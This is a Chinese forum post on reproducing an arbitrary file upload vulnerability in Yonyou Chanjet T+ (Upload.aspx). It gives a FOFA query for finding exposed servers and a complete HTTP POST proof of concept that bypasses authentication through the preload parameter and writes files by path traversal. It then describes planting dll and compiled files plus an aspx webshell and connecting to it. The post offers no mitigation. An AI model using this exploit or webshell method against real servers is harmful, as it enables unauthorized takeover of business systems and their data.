问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
Yonyou Chanjet T+ Upload.aspx 任意文件上传漏洞
# Yonyou Chanjet T+ Upload.aspx 任意文件上传漏洞 ## 漏洞描述 Yonyou Chanjet T+ Upload.aspx接口存在任意文件上传漏洞,攻击者通过 preload 参数绕过身份验证进行文件上传,控制服务...
Yonyou Chanjet T+ Upload.aspx 任意文件上传漏洞 ====================================== 漏洞描述 ---- Yonyou Chanjet T+ Upload.aspx接口存在任意文件上传漏洞,攻击者通过 preload 参数绕过身份验证进行文件上传,控制服务器 漏洞影响 ---- Yonyou Chanjet T+ 网络测绘 ---- app="Chanjet通-TPlus" 漏洞复现 ---- 登录页面  存在漏洞的接口为`/tplus/SM/SetupAccount/Upload.aspx`, 对应文件 `App_Web_upload.aspx.9475d17f.dll`  上传文件类型验证不完善,可上传任意文件到服务器中的任意位置,验证POC ```html POST /tplus/SM/SetupAccount/Upload.aspx?preload=1 HTTP/1.1 Host: Accept: */* Accept-Encoding: gzip, deflate Content-Length: 261 User-Agent: Mozilla/5.0 (iPod; U; CPU iPhone OS 3_0 like Mac OS X; ko-KR) AppleWebKit/535.16.4 (KHTML, like Gecko) Version/3.0.5 Mobile/8B117 Safari/6535.16.4 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryVXR9biLu Connection: close ------WebKitFormBoundaryVXR9biLu Content-Disposition: form-data; name="File1";filename="../../../../../../../Program Files (x86)/Chanjet/TPlusStd/WebSite/1.txt" Content-Type: image/jpeg 1 ------WebKitFormBoundaryVXR9biLu-- ``` 由于应用为预编译的,直接上传的 `aspx木马`无法直接利用,需要通过上传 `dll 与 compiled`文件后利用Webshell  将 `dll 与 compiled` 文件上传至 Web应用的 bin目录上,aspx上传至 Web根目录下    再访问写入的Webshell进行连接 ```html /tplus/shell.aspx?preload=1 ```
发表于 2024-07-12 18:47:49
阅读 ( 1820 )
分类:
Web应用
0 推荐
收藏
0 条评论
请先
登录
后评论
带头大哥
456 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!